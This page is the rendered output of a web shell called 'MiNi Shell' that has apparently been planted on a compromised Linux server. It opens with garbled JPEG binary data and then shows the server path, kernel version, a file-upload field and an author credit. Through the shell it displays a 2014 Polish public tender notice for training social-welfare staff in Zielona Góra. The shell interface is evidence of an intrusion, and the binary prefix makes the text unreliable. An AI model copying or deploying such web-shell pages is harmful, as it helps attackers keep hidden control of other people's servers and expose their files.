JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140313/84492-N-2014.html

<p class="kh_header"><b>Zielona Góra: Wykonanie usługi w zakresie kompleksowej organizacji szkoleń w ramach projektu systemowego pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej
w województwie lubuskimw podziale na części:

Część I Budowanie partnerstwa i współpraca na rzecz osób wykluczonych,
Część II Warsztat pracy pracownika socjalnego,
Część III Warsztaty rozwoju osobistego.</b><br>
<b>Numer ogłoszenia: 84492 - 2014; data zamieszczenia: 13.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej , Al. Niepodległości 36, 65-042 Zielona Góra, woj. lubuskie, tel. 68 323 18 80, faks 68 352 39 54.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi w zakresie kompleksowej organizacji szkoleń w ramach projektu systemowego pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej
w województwie lubuskimw podziale na części:

Część I Budowanie partnerstwa i współpraca na rzecz osób wykluczonych,
Część II Warsztat pracy pracownika socjalnego,
Część III Warsztaty rozwoju osobistego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi Wykonanie usługi w zakresie kompleksowej organizacji szkoleńw ramach projektu systemowego pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim,w podziale na części:

Część I Budowanie partnerstwa i współpraca na rzecz osób wykluczonych,
Część II Warsztat pracy pracownika socjalnego,
Część III Warsztaty rozwoju osobistego.

1.Pod pojęciem szkoleń Zamawiający rozumie pozaszkolne formy wsparcia, w tym: kursy, warsztaty, seminaria, konferencje, realizowane w ramach projektu systemowegopn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim.

2.Szkolenia należy zorganizować w centralnej części województwie lubuskiego. Wskazane jest aby szkolenia były zorganizowane poza Zieloną Górą i Gorzowem Wielkopolskim.
UWAGA: W przypadku szkoleń jednodniowych Zamawiający dopuszcza możliwość organizacji seminariów na teranie m. Gorzów Wlkp., lub m. Zielona Góra.
3.Szczegółowy opis przedmiotu zamówienia określają załączniki: nr 1a dla Części I,
nr 1b dla Części II, nr 1c dla Części III, stanowiące integralną cześć SIWZ.
UWAGA: Jednocześnie Zamawiający podkreśla, że właściwą formą realizacji szkoleń są zajęcia warsztatowe. Ogólna proporcja realizacji programu szkoleń to minimum 60% warsztat praktyczny i 40% teoria, którego celem jest dążenie do rozwoju indywidualnych umiejętności uczestników poprzez wykorzystanie interaktywnych metod pracy, np.: praca na przypadkach, symulacje..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.10.00.00-1, 70.22.00.00-9, 92.31.22.12-0, 55.30.00.00-3, 66.51.21.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium.
2.Warunkiem udziału w przetargu jest wniesienie wadium w kwocie ogólnej 6 850,00 zł (słownie złotych : sześć tysięcy osiemset pięćdziesiąt złotych), w przypadku składania ofert na daną część Zamawiający wymaga wadium w kwocie dla: 
- Części I: 3 000,00 zł (słownie: trzy tysiące złotych),
- Części II: 2 300,00 zł (słownie: dwa tysiące trzysta złotych,),
- Części III: 1 550,00 zł (słownie: jeden tysiąc pięćset pięćdziesiąt złotych,).

W przypadku Wykonawców, ubiegających się o kilka Części Zamówienia, należy zsumować wyżej wskazane wartości dla wybranych Części</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególowego warunku w zakresie spełnienia tego warunku.Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia-zgodnie z załoncznikiem nr 3 do SIWZ.
UWAGA: W przypadku Wykonawców, ubiegających się o kilka Części zamówienia, należy zsumować wyżej wskazane wartości dla wybranych Części, uwzględniając zgodność merytoryczną dla każdej Części zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalnościjest krótszy - w tym, okresie, wykonał lub wykonuje: 
1) jedną usługę szkoleniową tj.: warsztat, seminarium, konferencję lub inną formę podnoszenia kwalifikacjiw zakresie bezwzględnie zgodnym merytorycznie, w przypadku:
- Części I w zakresie realizacji szkolenia z budowania partnerstw na rzecz wykluczenia społecznego tworzenia zespołów ds. wykluczenia społecznego - na kwotę brutto nie mniejszą niż 40 000 zł, 

- Części II w zakresie realizacji szkolenia z Programów Aktywności Lokalnej w projektach systemowych jednostek organizacyjnych pomocy społecznej lub w zakresie superwizji pracy socjalnej lub w zakresie terapii zajęciowa w domach pomocy społecznej lub z zakresu zadań powiatowych centrów pomocy rodzinie w kontekście zmian do ustawy o pomocy społecznej oraz w perspektywie nowego okresu programowania 2014-2020 - na kwotę brutto nie mniejszą niż 30 000 zł,
- Części III w zakresie realizacji szkolenia z treningów interpersonalnych pracowników pomocy i integracji społecznej lub ze współpracy z mediami lub przygotowaniem pracowników do pracy w charakterze rzecznika prasowego - na kwotę brutto nie mniejszą niż 25 000 zł, 
2) Zamawiający, w przypadku gdy przedmiotem zamówienia są świadczenia okresowe i ciągłe dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane, w takim przypadku część zamówienia już faktycznie wykonana musi wypełniać wymogi określone przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca przedstawi wykaz osób wyznaczonychdo realizacji niniejszego zamówienia tj. 
Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje lub będzie dysponowałdo przeprowadzenia szkoleń minimum jedną osobą - trenerem, na każdą grupę szkoleniową, która posiada doświadczenie w prowadzeniu szkoleń z zakresu tematycznego niniejszego postępowania 
tj.: przeprowadziła minimum 10 szkoleń, zgodnych merytorycznie, z wybranymi częściami zamówienia, a także posiada praktyczne doświadczenie w zakresie niniejszego postepowania dla:
- Części I z inicjowania i budowania partnerstw na rzecz osób wykluczonych w środowisku lokalnym.
- Części II z inicjowania i realizacji Programów Aktywności Lokalnej w projektach systemowych jednostek organizacyjnych pomocy społecznej, Superwizji pracy socjalnej, terapii zajęciowa w domach pomocy społecznej, z zakresu zadań powiatowych centrów pomocy rodzinie w kontekście zmian
do ustawy o pomocy społecznej oraz w perspektywie nowego okresu programowania 2014-2020.
- Części III w dziennikarstwie oraz posiadającą wiedzę na temat problemów społecznychlub z doświadczeniem na stanowisku rzecznika prasowego,
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także z zakresu wykonywanych przez nie czynności oraz informacjąo podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 6 do SIWZ.
UWAGA: W przypadku osób- trenerów, którzy chcą prowadzić więcej niż jedno szkolenie w danej Części, powinni oni spełniać warunek posiadania doświadczenia praktycznego oraz w prowadzeniu szkoleń w zakresie każdego wykazanego tematu niniejszego przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000,00 zł.
Jeżeli z ww. dokumentu nie wynika, że składka została opłacona, Wykonawca winien dołączyć potwierdzenie tej opłaty lub opłaty raty składki wymaganej na dzień otwarcia ofert. Polisa winna
być aktualna na dzień składania i otwarcia ofert. Ubezpieczenie powinno obejmować cały okres wykonywania zamówienia. Ze względu na specyfikę zawierania umów ubezpieczeniowych, obejmujących okresy nie dłuższe niż jeden rok, dopuszczalne jest, po podpisaniu umowy, sukcesywne przedstawianie dowodów opłacenia polisy.
W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie przedmiotu zamówienia, wymagany dokument musi być złożony przez Wykonawcę, który wykazuje spełnienie warunków udziału w postępowaniu w ww. zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony i podpisany Formularz ofertowy- zgodnie z załącznikiem nr 2 do SIWZ.
2 Pełnomocnictwo - jeśli dotyczy.
3 Projekt umowy - zgodnie z załącznikiem nr 8 do SIWZ. Zaleca się, aby Wykonawca dołączyłdo oferty parafowany na każdej stronie projekt umowy. Nie załączenie do oferty ww. dokumentunie będzie skutkowało odrzuceniem oferty.
4.Wykaz zrealizowanych szkoleń - wg. wzoru załącznika 9 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wykaz zrealizowanych szkoleń - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie prawo wprowadzenia zmian do zawartej umowy z wybranym Wykonawcą w niniejszym postępowaniu, w przypadku wystąpienia niżej podanych okoliczności:
1)zmiany terminów realizacji zamówienia,
2)zmiany warunków płatności,
3)zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT,
4)zaistnienia siły wyższej (powódź, pożar, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy,
5)zmiany terminów szkoleń,
6)wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnychokoliczności, o których strony nie mogły przewidzieć przed zawarciem umowy, a które mają wpływ na terminy realizacji zamówienia m.in.: zmiany harmonogramu realizacji szkoleń, w razie zmiany liczby uczestników szkoleń w tym zmiany liczby osób, korzystających z noclegów,
7)zmiana trenera/wykładowcy w realizacji przedmiotu zamówienia ze względu na długotrwałe zwolnienie lekarskie lub inne przyczyny, których nie można przewidzieć w dniu zawarcia umowy z zastrzeżeniem że musi on posiadać doświadczenie zawodowe nie gorsze lub wyższe niż wskazane w warunku udziału w postępowaniu,
8)zmiana miejsca zakwaterowania uczestników szkolenia (hotelu, ośrodka szkoleniowego) wskazanego w ofercie. Zmiana ta jest dopuszczalna tylko i wyłącznie w sytuacji zaistnienia niemożliwej do przewidzenia i nie dającej się usunąć przeszkody, a nowe miejsca posiadają taki sam lub wyższy standard jaki został wskazany w ofercie.
2.Wykonawca wnioskujący o zmianę umowy, przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy nie później niż na 5 dni roboczych przed datą realizacji szkolenia. O wystąpieniu okoliczności mogących wpłynąć na zmianę umowy Wykonawca winien jest poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.lubuskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalnym Ośrodku Polityki Społecznej 
 w Zielonej Górze, al. Niepodległości 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2014 godzina 10:00, miejsce: Regionalnym Ośrodku Polityki Społecznej w Zielonej Górze, al. Niepodległości 36, sekretariat I piętro, pokój nr 10 w nieprzekraczalnym terminie do dnia 21 marca 2014 roku do godz. 10:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa współfinansowana ze środków Europejskiego Funduszu Społecznego (EFS) w ramach Programu Operacyjnego Kapitał Ludzki (PO KL), Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej, w ramach projektu pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I Budowanie partnerstwa i współpraca na rzecz osób wykluczonych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi Wykonanie usługi w zakresie kompleksowej organizacji szkoleńw ramach projektu systemowego pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskimw podziale na części:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.10.00.00-1, 70.22.00.00-9, 92.31.22.12-0, 55.30.00.00-3, 66.51.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wykaz zrealizowanych szkoleń - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II Warsztat pracy pracownika socjalnego,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi Wykonanie usługi w zakresie kompleksowej organizacji szkoleńw ramach projektu systemowego pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.10.00.00-1, 70.22.00.00-9, 92.31.22.12-0, 55.30.00.00-3, 66.51.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. wykaz zrealizowanych szkoleń - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie usługi w zakresie kompleksowej organizacji szkoleń w ramach projektu systemowego pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznejw województwie lubuskim w podziale na części:
Część I Budowanie partnerstwa i współpraca na rzecz osób wykluczonych,
Część II Warsztat pracy pracownika socjalnego,
Część III Warsztaty rozwoju osobistego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi Wykonanie usługi w zakresie kompleksowej organizacji szkoleńw ramach projektu systemowego pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim w podziale na części:

Część I Budowanie partnerstwa i współpraca na rzecz osób wykluczonych,
Część II Warsztat pracy pracownika socjalnego,
Część III Warsztaty rozwoju osobistego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.10.00.00-1, 70.22.00.00-0, 55.30.00.00-3, 66.51.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wykaz zrealizowanych szkoleń - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com